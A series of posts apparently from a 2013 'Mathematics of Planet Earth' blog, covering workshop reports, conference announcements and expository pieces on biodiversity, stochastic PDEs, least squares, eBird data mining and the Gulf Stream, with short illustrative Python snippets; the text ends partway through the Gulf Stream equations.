    One of the most interesting features of nonlinear integrable systems from a mathematical point of view is the fact that they possess a surprisingly rich and beautiful structure, and powerful analytical and asymptotic mathematical techniques are available to investigate the properties of these systems and solutions.

Nonlinear integrable systems have been extensively studied, and a large body of knowledge has been accumulated on them. At the same time, new solutions and new properties continue to be found, and many fundamental questions are still open. Among them are initial-value problems with non-trivial boundary conditions and boundary-value problems. This SQuaRE (Structured Quartet Research Ensemble) aims to address and resolve some of these issues.

    Posted in Mathematics, Workshop Report | Leave a comment

    Henbury Conservation Project

    This really interesting project was brought to my attention by Ian Noble at the JSPS Symposium on “Climate Change.” Thanks, Ian, for a very good presentation on “Land and Our Responses to Climate Change.” -HGK

    Preserving biodiversity and habitat

    The Carbon Farming Initiative (CFI) allows farmers and land managers in Australia to earn carbon credits by storing carbon or reducing greenhouse gas emissions on the land. These credits can then be sold to people and businesses wishing to offset their emissions.

    The CFI also helps the environment by encouraging sustainable farming and providing a source of funding for landscape restoration projects.

    The CFI is a carbon offsets scheme that is part of Australia’s carbon market. Legislation to underpin the CFI was passed by Parliament on 23 August 2011.

    One of the participants is Henbury Station, a spectacular property in Australia’s arid Red Centre. It covers more than 500,000 hectares (5,000 square kilometres) to the south of Alice Springs, extending from the spectacular MacDonnell Ranges across the vast, open red plains of the diverse Finke bioregion. While Henbury has previously operated as a cattle station, 70 per cent of the huge property remains largely in its natural condition.

    The $13 million property was purchased by R.M. Williams Agricultural Holdings in 2011 with the support of the Australian Government through its Caring for our Country initiative. It is the largest property ever purchased for the National Reserve System with Australian Government support.

    Posted in Carbon Cycle | Leave a comment

    SIAM Conference on Computational Science and Engineering

    One of the reasons for designating 2013 as the year of “Mathematics of Planet Earth” is to showcase the work done by mathematics in application areas like climate, ocean, and earth sciences. The SIAM Conference on CS&E, which begins on February 25th, contains many sessions relevant to MPE 2013.

    The SIAM Conference on CS&E (Computational Science and Engineering) focuses on computational methods, often in the context of an application. For example, the session on adjoint methods in the earth sciences focuses on a specific set of mathematical and computational methods for solving inverse problems, but with particular application to problems in seismology, meteorology, and geodynamics. Another example occurs in the control of air flow in commercial buildings – an important development for minimizing energy consumption – where model reduction techniques are developed and used for energy-efficient building design. Other examples are sessions on modeling and simulation of complex energy systems, such as the electrical power grid and cascading power system failures. New numerical tools are explored for improved modeling of weather, climate, and the oceans; these include cubed-sphere grids for atmospheric models, such as modeling tropical cyclones. Other sessions look at models for earthquake rupture dynamics. Sessions also look at new computational methods, such as using implicit solvers to overcome scale disparities, for various atmospheric and ocean models which are essential components in climate models. It is the mathematical models and computational methods that enable accurate models and predictive simulations that are essential for understanding the various phenomena relevant to planet earth.

    More reports on some of these will follow at a later date.

    Click here for more information on the SIAM Conference on CS&E.

    Posted in Computational Science, Conference Announcement | Leave a comment

    Report: JSPS Symposium on “Climate Change”

    On Friday, February 23, 2013, I attended a Symposium on “Climate Change,” organized by the Japan Society for the Promotion of Science (JSPS) and co-sponsored by the AAAS, NAS, NASA, NOAA and NSF. The symposium was held at the Cosmos Club in Washington, DC.

    The JSPS goes back to 1932, when it was established with an imperial endowment as a core funding agency to support the advancement of science. Recently, it was converted to an independent administrative agency that supports research programs at universities, awards fellowships to young scientists, and supports international research activities.

    The JSPS organizes symposia and workshops on a variety of topics. The theme of this symposium, “Climate Change,” was very timely. The scientific program was organized by Professor Akimasa Sumi (DSc Geophysics, 1985, University of Tokyo), Vice President, National Institute of Environmental Studies in Japan.

The talks were organized around three themes: Atmosphere (coordinated by Akimasa Sumi), Water (coordinated by Taikan Oki, Institute of Industrial Science, University of Tokyo), and Land (coordinated by Jayant Sathaye, Lawrence Berkeley Lab), although the boundaries were not always strictly maintained. The talks covered a broad spectrum of issues, ranging from GCMs to hydroclimate variability, water, natural resources, land cover, extreme events, risks, adaptation, mitigation, and social change. Some speakers elaborated on themes presented in IPCC AR4, other speakers covered new territory, anticipating IPCC AR5. There was a strong emphasis on regional problems, mostly related to China, India, Brazil, and California. The program can be found here.

    The symposium was attended by about 100 people, representing academia, government departments and agencies, professional societies, professional publications, and private companies. It was a day well spent; the presentations were informative, and I made several new contacts.

    Let me conclude with a personal observation. I was surprised to see that all the speakers and organizers of this symposium were male, with one exception (the NSF Program Director, who gave the concluding remarks at the end of the symposium). If I did not know any better, I could have concluded that climate science is the domain of men. Please, pay more attention to diversity.

    Posted in Climate Change, Conference Report | 1 Comment

    Letter from Banff

    I was planning to send an update every day from the data assimilation workshop at the Banff Center, but I’ve been so busy here that by the time I get back to my room I’m ready to collapse. The Banff Center is the best place I know of for a workshop. It’s almost like working hard and being on vacation at the same time, with the benefits of both. The scenery is spectacular, the facility is first rate, the food is wonderful and we are indeed working hard. As I told people who asked me what it would be like, you have to be at the top of your game the entire week. This is a talented enthusiastic group, the talks have been superb, all of them, and the discussion following the talks has been so interesting that nobody wants to stop.

I knew it was going to be this way. I rode the shuttle from the Calgary airport to Banff Center with Kayo Ide, Andrew Lorenc and Juan Restrepo, and a serious scientific discussion broke out almost as soon as we settled into our seats. The two-hour shuttle ride went by in a blink.

We have 24 participants, some grad students, some postdocs, a few mid-career types and a few old graybeards like me. We were expecting 26, but there were two last-minute cancellations, both for medical reasons. There was a time when everyone in the world who worked on data assimilation in the ocean and atmosphere would have fit in the conference room here, but that was decades ago; the field is now too large for anyone to know everybody, as was still possible in the late 1980s and early 1990s. I’m still surprised to hear about interesting work being done by people that I have never met.

    Andrew Lorenc gave the opening talk, as he did at the last Banff data assimilation meeting in 2008. He’s one of the very few people who’s still active and has been doing data assimilation longer than I have. He gave an excellent hour-long talk on the outlook for data assimilation at the UK Met Office for the next 5-10 years. We also had talks by people from Environment Canada, NASA and NCEP, and a nice talk on hurricane prediction by Fuqing Zhang.

    Tuesday’s talks were mostly concerned with ensembles, ensemble methods and direct calculation of probability density functions. Monday and Tuesday provided us with plenty of material for detailed discussion. We left Wednesday afternoon free for us to take a break and explore Banff and the surrounding mountains. A number of us went hiking. The views were spectacular, but the trails were icy and the steep parts were treacherous to navigate. Upon return to the Banff Center I took advantage of the excellent gym to have a swim and a soak in the hot tub.

    We had fewer talks today, with the hour-long finale given by Pierre Gauthier on diagnostics for data assimilation and models. Pierre is another one of the experienced people who attended. His topic was well chosen and his presentation was clear, thorough and thought provoking, as his presentations have been consistently over the twenty odd years that I have known him.

    Meetings like this are exceptional. The long discussions with talented enthusiastic people at all stages of their careers reminded me why I signed up for the life of a scientist. Details can be found on the BIRS website.

    Posted in Workshop Report | Leave a comment

    Some Mathematics Behind Biological Diversity

    Picture a meadow in spring: grasses and flowers abound, different species competing for our attention and appreciation. But these various species also compete for other things. They compete for water and essential resources to grow, for space, for light. A similar picture emerges when we look at animals: insects, birds, mammals, fish. Usually several species coexist in the same location, albeit not always peacefully, as we shall see.

    This diversity of species is beautiful, but it can be puzzling as well. Mathematical models and early biological experiments by G.F. Gause indicate that if two or more species compete for the same single limiting resource (for example water or nitrogen in the case of plants), then only the one species that can tolerate the lowest resource level will persist and all others will go extinct at that site. Granted, there may be more than one limiting resource. But S.A. Levin extended the mathematical result to say that no more species can stably coexist than there are limiting factors. In less mathematical terms: If one wants to have a certain number of biological species to coexist, then one needs to have at least that same number of ecological opportunities or niches. In the words of Dr. Seuss (from On Beyond Zebra)

    And NUH is the letter I use to spell Nutches
    Who live in small caves, known as Nitches, for hutches.
    These Nutches have troubles, the biggest of which is
    The fact there are many more Nutches than Nitches.
    Each Nutch in a Nitch knows that some other Nutch
    Would like to move into his Nitch very much.
    So each Nutch in a Nitch has to watch that small Nitch
    Or Nutches who haven’t got Nitches will snitch.
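
To make the exclusion principle concrete, here is a minimal numerical sketch (a toy chemostat-style model with invented parameter values, not the models used by Gause or Levin): two species consume a single limiting resource, and the species that can persist at the lower resource level excludes the other.

import numpy as np
from scipy.integrate import solve_ivp

# Toy model: resource R supplied at rate S, consumed by species N1, N2.
# dR/dt  = S - d*R - R*(c1*N1 + c2*N2)
# dNi/dt = Ni*(ci*R - mi)
# Species i can only persist if R stays above its break-even level R*_i = mi/ci;
# the species with the lower R* wins (competitive exclusion).
S, d = 1.0, 0.1
c1, m1 = 1.0, 0.2   # R*_1 = 0.2
c2, m2 = 0.8, 0.3   # R*_2 = 0.375  -> species 2 should go extinct

def rhs(t, y):
    R, N1, N2 = y
    dR = S - d * R - R * (c1 * N1 + c2 * N2)
    return [dR, N1 * (c1 * R - m1), N2 * (c2 * R - m2)]

sol = solve_ivp(rhs, (0.0, 400.0), [1.0, 0.1, 0.1])
R, N1, N2 = sol.y[:, -1]
print(f"final resource level R = {R:.3f} (compare R*_1 = {m1/c1}, R*_2 = {m2/c2})")
print(f"species 1: {N1:.3f}, species 2: {N2:.3f}")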

    These insights were powerful incentives to develop new theory and devise new experiments, mathematical and ecological, to explain why there is so much diversity of species almost everywhere we look. Most of the answers come in the form of some kind of “trade-off”.

There is the spatial trade-off. Some species are better at exploiting a resource, some are better at moving towards new opportunities. After a patch of land frees up in the Canadian foothills – maybe from fire or logging – aspen trees move in quickly and establish little stands there. Given enough time, the slower-moving spruce will come and replace the aspen, because it can utilize the resources more efficiently.

    Another trade-off is temporal when the resource fluctuates. For example, water is fairly plentiful in the Canadian prairies in the spring, but later in the summer and the fall, there can be serious droughts. Some plants grow very fast early in the year when water is abundant, but are out-competed later in the year by others who can tolerate low water levels.

When grazing or predatory species enter the picture, new opportunities for biodiversity open up. The trade-off now lies in being good at resource competition or being good at fending off predators. Sometimes, predation can induce cycles in an ecological system. A particularly well-known cyclic system is that of the snowshoe hares and lynx in Western Canada. There is evidence of these cycles already in the trading books of the Hudson’s Bay Company. When the internal dynamics of predation induce cycling, the temporal trade-off can give additional opportunities for coexistence of competing species.

Most recently, researchers in ecology and mathematics have recognized that not all relationships between competing species are purely competitive; some are partly mutualistic. For example, owls and hawks hunt similar rodent species, but one hunts at night and the other during the day. Combined, they don’t give their prey a safe time to forage. In some cases, researchers have found that the combined predation rate of two competing predators is higher than the sum of their predation rates in isolation. Mathematical models then demonstrate that even moderate amounts of mutualistic behavior between competing species can lead to stable coexistence: one more mechanism that promotes the coexistence of a large diversity of biological populations.

    ************************************************
    Frithjof Lutscher
    Department of Mathematics and Statistics
    University of Ottawa
    Frithjof.Lutscher@uottawa.ca
    ************************************************

    Posted in Biodiversity, Mathematics | Leave a comment

    Report on the Workshop “Stochastics in Geophysical Fluid Dynamics: Mathematical foundations and physical underpinnings”

    Prepared by Roger Temam (Indiana University) and Nathan Glatt-Holtz (University of Minnesota/Virginia Tech)

    Last week a workshop was held at the American Institute of Mathematics (AIM) in Palo Alto, California, around the theme of stochastic PDEs and applications in climate and weather modeling:

“Stochastics in Geophysical Fluid Dynamics: Mathematical foundations and physical underpinnings.”

    The workshop brought together a lively mix of specialists in climate modeling and weather prediction alongside experts in the fields of deterministic and stochastic partial differential equations.  

Stochastic Differential Equations (SDEs) have their origins in the study of Brownian motion, the irregular motion of particles under the influence of random bombardment, first observed by the botanist Robert Brown in the 19th century and later explained by Albert Einstein in 1905.

The mathematical theory traces its origins to the work of Norbert Wiener and Andrey Kolmogorov in the 1920s. The key discovery of the stochastic integral and an associated ‘stochastic calculus’, which lies at the center of the theory, was made independently in the early 1940s by Kiyoshi Itō and by Wolfgang Doeblin.

Roughly speaking, Brownian motion {B(t)}_{t \geq 0} is a time-evolving random process for which B(t) follows the normal (Gaussian) distribution with mean zero and variance t. A key property is that Brownian motion has ‘independent increments’, that is, B(t) – B(s) is independent of B(s) – B(r) for any t > s > r. This last property gives Brownian motion its irregular character.

Stochastic differential equations are equations driven by the derivative of Brownian motion, ‘white noise’, which is often used in modeling as a proxy for uncertainty. Indeed, today SDEs are widely used in diverse modeling applications ranging from biological population models to hedging in finance, where they provide the foundation for the infamous Black–Scholes–Merton model. From a theoretical point of view they play a central role in the modern theory of probability and stochastic processes.
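
For readers meeting SDEs for the first time, here is a minimal Euler–Maruyama sketch (a generic illustration, not a scheme discussed at the workshop) for the Ornstein–Uhlenbeck equation dX = −θX dt + σ dB, a standard toy model of a quantity fluctuating about a mean:

import numpy as np

rng = np.random.default_rng(0)
theta, sigma = 1.0, 0.5      # relaxation rate and noise amplitude (illustrative values)
T, n = 10.0, 10_000
dt = T / n

x = np.empty(n + 1)
x[0] = 2.0
for k in range(n):
    dB = rng.normal(0.0, np.sqrt(dt))                    # Brownian increment ~ N(0, dt)
    x[k + 1] = x[k] - theta * x[k] * dt + sigma * dB     # Euler-Maruyama step

print("sample mean over the path:", x.mean())
print("theoretical stationary std:", sigma / np.sqrt(2 * theta))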

The study of stochastic partial differential equations (SPDEs) traces its origins to the 1960s. They first appeared in the theory of filtering (the optimal melding of empirical data with a dynamical model to more accurately predict the state of a physical system), in the study of turbulence in fluid flows, and in biological models of neurons.

Since the 1970s, SDEs and SPDEs have played an increasingly large role in climate and weather applications. As was explained during the workshop, SDEs and SPDEs are introduced for various reasons: to account for uncertainties in the various data introduced in the codes (e.g., initial and boundary conditions); to account for the uncertainties in the physics of some complex phenomena (such as the parameterization of clouds, or of the strength of the wind above the oceans); and to account for the errors due to the discretizations. For example, the typical mesh used in General Circulation Models (GCMs) is nowadays about 15 to 25 km; this does not allow for a fine description of the cloudiness in the numerical cells, and statistics is used to give an averaged local description.

    The week was highlighted by many interesting lectures which promoted significant dialogue and cross-pollination of ideas between the two communities.   These lectures were followed by lengthy moderated discussions which provided an opportunity for both sides to ask `naive’ questions and to formulate novel research problems and directions. This was a rare opportunity for both sides to interact in an informal setting.   

    In addition to the lectures of Mohammed Ziane and Joe Tribbia (see our previous post) some of the week’s talks included:

1) Cecile Penland (NOAA) gave an overview of the current state of uncertainty quantification in operational weather models and discussed how these estimates could be improved with the use of more sophisticated stochastic methods. Her lecture was a useful reminder to the mathematical community of the daunting complexity of the existing numerical models and the uneven quality of the atmospheric data available.

2) Boris Rozovskii (Brown) outlined recent developments in the use of Wiener chaos expansions in the numerical and theoretical study of stochastic partial differential equations.

3) Antonio Navarra (Centro Euro-Mediterraneo sui Cambiamenti Climatici) described recent developments in the use of Feynman path integrals to calculate probability distributions for certain stochastic climate models.

4) David Neelin (UCLA) discussed approaches to parameter estimation and sensitivity in precipitation models.

5) Mickael Chekroun (UCLA/Hawaii) introduced theoretical and practical approaches to Markov approximation of chaotic models and discussed applications from his joint work with David Neelin.

6) Franco Flandoli (Pisa) gave an overview of the mathematical foundation of the Kolmogorov equations and discussed practical challenges in the computation of probability distributions for nonlinear stochastic PDEs.

7) Susan Friedlander (USC) discussed recent developments in the understanding of the inertial structure of the 3D Navier-Stokes equations and explained connections to turbulent flows. Motivated by this work she also introduced some novel ‘shell models’ which permit the recovery of the fundamental statistical quantities arising in 3D turbulence theory.

8) Armen Shirikyan (Université de Cergy-Pontoise, Paris) discussed ergodic and mixing properties of the stochastic and randomly kick-forced 2D Navier-Stokes equations and related models. He also discussed normal approximation and large deviations for these models.

9) Peter Kloeden (Goethe-Universität) discussed theoretical and practical issues involved in the numerical simulation of finite- and infinite-dimensional stochastic equations using Taylor expansion methods.

10) Nathan Glatt-Holtz (University of Minnesota/Virginia Tech) discussed inviscid limits for stochastic fluid equations and relationships with turbulence theory.

    Posted in Climate Modeling, Conference Report, Mathematics, Probability, Weather | Leave a comment

    2013 AARMS Mathematical Biology Workshop

    We are pleased to announce the 2013 AARMS Mathematical Biology Workshop to be held at Memorial University of Newfoundland, July 27-29, 2013, in St John’s, Newfoundland. Registration closes on May 17, 2013 and abstracts should be submitted by June 30, 2013.

    Plenary speakers:
    Edward Allen, Texas Tech University
    Linda Allen, Texas Tech University
    Steve Cantrell, University of Miami
    Odo Diekmann, Utrecht University
    Simon Levin, Princeton University
    Mark Lewis, University of Alberta
    Philip Maini, Oxford University

    Details at the conference website.

    Posted in Biology, Mathematics, Workshop Announcement | Leave a comment

    Asteroids

    The close approach of the asteroid that we have all read about in the newspapers represents something of a coincidence for me as I prepare for the data assimilation workshop in Banff this coming week. Gauss invented data assimilation as we know it for the purpose of calculating asteroid orbits. The orbit of an asteroid around the sun is determined by six parameters. Given observations of an asteroid, he chose the parameters that would minimize the sum of squared differences between the observed and predicted values. I don’t know whether he considered more complicated orbital calculations that would have taken the gravity fields of Jupiter or Mars into account. Why Gauss would have spent his time doing this I don’t know. Two centuries later, most data assimilation systems still rely on least squares.
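
In miniature, the calculation looks something like this (a toy least-squares fit of a few parameters of a periodic signal; the model and numbers are invented for illustration and are far simpler than a real orbit determination):

import numpy as np

rng = np.random.default_rng(1)

# Toy "orbit": fit amplitude, phase and offset of a periodic signal to noisy observations.
t = np.linspace(0.0, 4.0, 40)                      # observation times
a_true, b_true, c_true = 1.3, -0.7, 0.2
obs = a_true * np.cos(2 * np.pi * t) + b_true * np.sin(2 * np.pi * t) + c_true
obs += rng.normal(0.0, 0.05, size=t.size)          # measurement noise

# Design matrix: the model is linear in the unknown parameters,
# so minimizing the sum of squared residuals is a linear-algebra problem.
A = np.column_stack([np.cos(2 * np.pi * t), np.sin(2 * np.pi * t), np.ones_like(t)])
params, *_ = np.linalg.lstsq(A, obs, rcond=None)
print("estimated parameters:", params)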

    Some may question Gauss’ title as inventor of data assimilation, as Legendre did at the time. Eric Temple Bell, in one of his books, described an exchange of letters between Gauss and Legendre, in which Legendre pointed out that he had published the least squares method before Gauss’ paper on asteroid orbits appeared. Legendre humbly asked Gauss to acknowledge his proudest achievement. Surely Gauss, for all his great accomplishments, could acknowledge what Legendre described in a charming biblical reference as “My one ewe lamb.” Gauss refused, saying that he had, in fact, formulated the least squares method independently before Legendre. This turned out to be true. The least squares method appeared in Gauss’ notebooks before Legendre’s paper, but Legendre published first.

    It’s likely, though not certain, that the accounts in the media of the asteroid that recently passed within the orbits of our geostationary satellites are based on least squares calculations. There are alternatives. Someone once told me that the trajectory of the European Space Agency’s Ariane launch vehicle is calculated by probabilistic methods based on the theory of stochastic differential equations. I asked him how they did that, and he laughed and said “Oh, they will not tell you.” However they do it, it’s a hard calculation, probably impossible without electronic computing machinery, even given Gauss’ legendary calculating abilities.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Astrophysics, Data Assimilation | Leave a comment

    Report on “Models and Methods in Ecology and Epidemiology (M2E2)”

    “Science without data is science-fiction”

This was one of the boldest (if also one of the more facetious…) statements heard at the workshop “Models and Methods in Ecology and Epidemiology (M2E2)” held at CRM last week. Speakers from very diverse backgrounds presented a wide range of mathematical models developed to better understand the dynamics and propagation mechanisms of, amongst others, Avian Flu, Lyme Disease and the West Nile virus. Throughout the presentations, the pervasive role played by data incorporation in the models was emphasized, and the equally important organization of model development as a team effort was underlined. The contribution of, amongst others, entomologists, ecologists and public health officials in formulating the realistic details of the dynamical models was a recurring theme. The mechanisms of data acquisition need to be examined, since bias and uncertainty are easy to underestimate, and new technologies must be explored to make data acquisition more reliable: equipping wild birds with individual satellite transmitters was seen to significantly enhance our understanding of migratory routes. A recent development is the incorporation of social behavior in some of the disease propagation models, with the expansion of social media posing significant challenges to the understanding of these literally human aspects.

The scientific problems covered were broad, and the mathematical techniques employed equally comprehensive: finite-difference equations and, as expected, differential equations (some of the delayed variety, others in the more traditional PDE clothing). The computing power required was equally broad, from essentially pencil-and-paper to supercomputing via GIS.

    For those of us with some experience in mathematical modeling, this is far from surprising: it just re-emphasizes the global scheme involved, as illustrated below [1].

The analysis of the mathematical models, numerical or otherwise, is but a fraction of the process involved in bringing mathematics to bear on the solution of the challenging problems facing Planet Earth, in 2013 and for the foreseeable future.
    Indeed, there is more to Life than proving theorems.

    [1] J. Bélair, Chaos et complexité, modèles et métaphores: quelles leçons pour l’enseignement des mathématiques. In: Affronter la complexité: nouvel enjeu de l’enseignement des mathématiques, F. Caron (ed.), Proceedings of the Annual Meeting of the Québec Group of Mathematics Didacticians (2005), pp. 135-145.

    Posted in Conference Report, Disease Modeling, Ecology, Epidemiology, Mathematics | Leave a comment

    Earth from Space

    Perhaps you’ve seen this already, but it’s pretty amazing, and features some well-known faces: Earth from Space

    Sean Crowell
    Mathematics and Climate Research Network (MCRN)
    sean.m.crowell@gmail.com

    Posted in General | Leave a comment

    Bird Watchers and Big Data

    You would be forgiven for not initially recognizing some of the high-level similarities between the practice of research in sciences such as physics and research in ornithology. One basic similarity is that we are all constrained in what we can measure. Quantum physics has its uncertainty principle that describes limits on what can be measured. Ornithologists are at times limited in what they can measure by the very things that they are trying to observe: birds will sometimes actively avoid detection. Additionally, we all have to deal with imperfect measuring devices and the need to create calibrations for these devices. And we all need to do “big science” to find answers to some of our questions. In the case of ornithology, various groups are building sensor networks that span countries if not entire continents. It’s just that ornithologists call their sensors “bird watchers.”

One of these ornithological sensor networks was prototyped roughly sixteen years ago across the United States and Canada, called the Great Backyard Bird Count (GBBC). It served as a test platform for engaging the general public in reporting bird observations over a large geographical area, as well as for the web systems needed to ingest and manage the information that was provided. While the GBBC still happens each year, engaging tens of thousands of people over a single long weekend in February, some of the GBBC’s participants keep counts and report on the birds that they see year-round, and from the GBBC a global bird-recording project emerged, named eBird. eBird collects a lot of data, thousands of lists of birds each day, at a rate fast enough that you can watch the data coming into the database.

    So, what do we do with all of those data? That’s where mathematics comes into the picture in a big way. As I already wrote, we know that the lists of birds that people report are not perfect records of the birds that were present. Some subset of the birds, and even entire species, almost certainly went undetected. We need to account for these uncertainties in what observers detect in order to get an accurate picture of where birds are living, and where they’re traveling. Sometimes we have enough background information to be able to write down the statistical equations that describe the processes that affect the detection of birds and the decisions that birds make about where to live. There are other times, however, when we do not know enough to be able to write down an accurate statistical model in advance, but instead we need to discover the appropriate model as part of our analyses of the information. In these instances, our analyses fall into the realm of data mining and machine learning.
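
As a schematic of this kind of analysis (entirely synthetic data and a generic off-the-shelf classifier, not the actual eBird pipeline), one might relate detection records to environmental covariates and observation effort like this:

import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(2)
n = 5_000

# Synthetic checklists: two habitat covariates plus observation effort.
forest_cover = rng.uniform(0, 1, n)
temperature = rng.uniform(-5, 30, n)
effort_hours = rng.exponential(1.0, n)

# Hypothetical "true" occupancy preference plus imperfect detection that improves with effort.
occupied = (forest_cover > 0.4) & (temperature > 10)
p_detect = 1 - np.exp(-1.5 * effort_hours)
detected = occupied & (rng.uniform(0, 1, n) < p_detect)

X = np.column_stack([forest_cover, temperature, effort_hours])
model = RandomForestClassifier(n_estimators=200, random_state=0).fit(X, detected)

# Predict relative probability of detection across a habitat gradient at fixed effort.
grid = np.column_stack([np.linspace(0, 1, 5), np.full(5, 20.0), np.full(5, 1.0)])
print(model.predict_proba(grid)[:, 1])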

Using a novel machine-learning method, we are able to describe the distributions of bird species across the United States, accurately showing where species are found throughout the entire year. The map, below, is an example of the results. This map shows the distribution of a bird species called the Orchard Oriole, which winters in Central and South America. In spring, most of these orioles fly across the Gulf of Mexico to reach the United States, where the migrants divide up into two distinct populations: one living in the eastern United States and a second population in the Great Plains states. Then in fall, both populations take a more westerly route back to their wintering grounds along the east coast of Mexico. Being able to accurately describe the seasonally-changing distribution of these orioles and other species of birds means that our machine-learning analyses were able to use information on characteristics of the environment, such as habitat, in order to identify the preferred habitats of birds as well as how these habitat preferences change over the course of a year. So, not only do these analyses tell us where birds are living, but these analyses also provide insights into the reasons why birds choose to live where they do.

    Animated map created by “The Cornell Lab of Ornithology”

    Knowing where birds live isn’t an end in itself. Being able to create an accurate map of a species’ distribution means that we understand something about that species’ habitat requirements. Additionally, knowledge of birds’ distributions, especially fine-grained descriptions of distributions, can have very practical applications. This observation was the basis for a very practical application: determining the extent to which different parties are responsible for conservation and management of different bird species. This effort, jointly undertaken by a number of governmental and non-governmental agencies, took the continent-wide range maps throughout the year and superimposed them on information about land ownership throughout the United States. The result was the first assessment of the extent to which many bird species were living on lands that were publicly or privately owned, and within the public lands the agencies most responsible for management were also identified. The product, the State of the Birds report for 2011, provided the first quantitative assessment of management responsibilities for a large number of species across their U.S. ranges.

    The computational work underlying the State of the Birds report is a final point of similarity between ornithology and other big-data sciences: all of the model building is well beyond the capacity of a desktop computer. Climatology, astronomy, and biomedical research all readily come to mind as areas of research that make heavy use of high-performance computer systems (or supercomputers) in which a larger task can be broken into many smaller pieces that are each handled by one of a large number of individual processing units. The building of hundreds of year-round, continent-wide bird distribution models lends itself to this same divide-and-conquer process, because the continent-wide distribution models are built from hundreds of sub-models that each describes environmental associations in a smaller region and narrow slice of time.
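
The divide-and-conquer structure is easy to mimic on a small scale (a schematic only; the real analyses involve far larger sub-models and a proper cluster scheduler):

from concurrent.futures import ProcessPoolExecutor
import numpy as np

def fit_submodel(region_seed):
    """Fit one small regional/seasonal sub-model on synthetic data and return a summary."""
    rng = np.random.default_rng(region_seed)
    x = rng.uniform(0, 1, 200)
    y = 2.0 * x + rng.normal(0, 0.1, 200)   # stand-in for a regional relationship
    slope = np.polyfit(x, y, 1)[0]
    return region_seed, slope

if __name__ == "__main__":
    regions = range(8)                      # pretend each seed is one region/time slice
    with ProcessPoolExecutor() as pool:
        results = list(pool.map(fit_submodel, regions))
    print(results)                          # the sub-models would then be stitched together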

    The collection of citizen-science data in the Great Backyard Bird Count and eBird is only the start of a long process of gaining insights from these raw data. Extracting information from the data has required collaboration between ornithologists, statisticians, and computer scientists working together in the interface between biology and mathematics. As an ornithologist by training, it has been an interesting and exciting journey for me to travel.

    Wesley Hochachka

    Dr. Wesley Hochachka is a senior research associate at Cornell University, and the assistant director of the Bird Population Studies program at the Cornell Lab of Ornithology.

    Posted in Biology, Data Visualization | Leave a comment

    Workshop on “Mathematics of climate change, related hazards and risks”

    A 5-day workshop on “Mathematics of climate change, related hazards and risks” will be held at the Centro de Investigación en Matemáticas (CIMAT) in Guanajuato, Mexico, July 29-August 2, 2013. This workshop, organized as part of the global program Mathematics of Planet Earth 2013 (MPE2013), is a satellite workshop associated with the 2013 Mathematical Congress of the Americas (MCA).

The workshop will bring together about 40 early career scientists, mainly from Central and South America, and nine distinguished scientists, each of whom will give several lectures on a chosen topic. The workshop format will provide ample time for personal and group discussions and topical round tables to facilitate networking across the central themes of Natural Hazards research.

    Deadline for application to this workshop is March 31, 2013.

    Posted in Climate, Conference Announcement, Natural Disasters, Risk Analysis | 1 Comment

    There Will Always be a Gulf Stream — An Exercise in Singular Perturbation Technique

    One hears occasionally in the popular media that one possible consequence of global warming might be the disappearance of the Gulf Stream. This makes physical oceanographers cringe. The Gulf Stream and its analogs in other ocean basins exist for fundamental physical reasons. Climate change may well bring changes in the Gulf Stream. It may not be in the same place, may not be of the same strength or have the same temperature and salinity characteristics, but as long as the continents bound the great ocean basins, the sun shines, the earth turns toward the east and the wind blows in response, there will be a Gulf Stream. There will also be a Kuroshio, as the analogous current in the north Pacific is called, as well as the other western boundary currents, so called because, like the Gulf Stream, they form on the western boundaries of ocean basins.

The dynamical description of the Gulf Stream can be found in just about any text on physical oceanography or geophysical fluid dynamics. I first learned the general outlines of ocean circulation as a young postdoc, when my mentor Allan Robinson walked into my office and dropped a copy of “The Gulf Stream” by Henry Stommel on my desk and said “Read this, cover to cover.” We’ve learned a great deal about western boundary currents in the fifty years since “The Gulf Stream” was published, but it’s still an excellent introduction to the subject and a good read. “The Gulf Stream” is long out of print, but used copies can occasionally be found. I got mine at Powell’s for six bucks, with original dust jacket. Electronic versions in many formats can be found here.

    There are lots of places to learn about the wind driven ocean circulation. My purpose here is to present the fundamental picture as an exercise in perturbation technique.

    1. The beta-plane

    We model an ocean basin in Cartesian coordinates:

    \begin{eqnarray}
(1)\qquad& x &= R \cos(\phi_0 )(\lambda - \lambda_0)\\
    (2)\qquad& y &= R (\phi – \phi_0)\\
    (3)\qquad& z &= r-R
    \end{eqnarray}

where $(\phi , \lambda , r )$ are the coordinates of a point with latitude $\phi$, longitude $\lambda$ and distance $r$ from the center of the earth, and $R$ is the radius of the earth. $\phi_0$ and $\lambda_0$ are the latitude and longitude of a reference point in the mid-latitudes. We account for the rotation of the earth by the Coriolis parameter $f=2\Omega \sin\phi$, where the angular speed of rotation of the earth is $\Omega = 2\pi /86400\,\mathrm{s}$. We approximate the Coriolis parameter as a linear function of latitude, $f = f_0 + \beta y$, with $f_0 = 2\Omega\sin\phi_0$ and $\beta = (2\Omega /R)\cos\phi_0$. This is the only effect we will consider of the fact that the earth is round.

    2. The Reduced Gravity Model

    We model the density-stratified ocean as being composed of two immiscible fluids of slightly different densities in a stable configuration, i.e., the more dense fluid lying below the less dense one. In such a configuration, there is a family of waves that is much slower than the waves on the surface of a homogeneous fluid of the same depth would be. You’ve probably seen the effect in the clear plastic boxes containing different colored fluids, usually one clear and the other blue, that are sold as toys in stationery stores, or on the internet, e.g., here. When you tip the box you see waves propagate slowly along the interface. We simplify the two layer model further by assuming that the deeper layer is motionless, so the thickness of the upper layer adjusts in such a way as to make the pressure gradient vanish in the lower layer. The equations of motion for the upper layer are formally identical to the shallow water equations, but with the
acceleration of gravity $g\approx 10\,\mathrm{m\,s^{-2}}$ reduced by a factor of $\Delta \rho /\rho_0$, where $\Delta\rho$ is the (small) density difference between the two layers and $\rho_0$ is the density of the upper layer.

The equations for steady linear flow on the $\beta$-plane for the reduced gravity model in the rectangle $x\in [0, a]$, $y\in [0,b]$ are:

    \begin{eqnarray}
(4)\qquad& -fhv + g^{\prime}hh_x &= -(\tau_0/\rho_0) \cos(\pi y/b) - A(uh)\\
    (5)\qquad& fhu + g^{\prime}hh_y &= -A(vh)\\
    (6)\qquad& (hu)_x + (hv)_y &= 0
    \end{eqnarray}

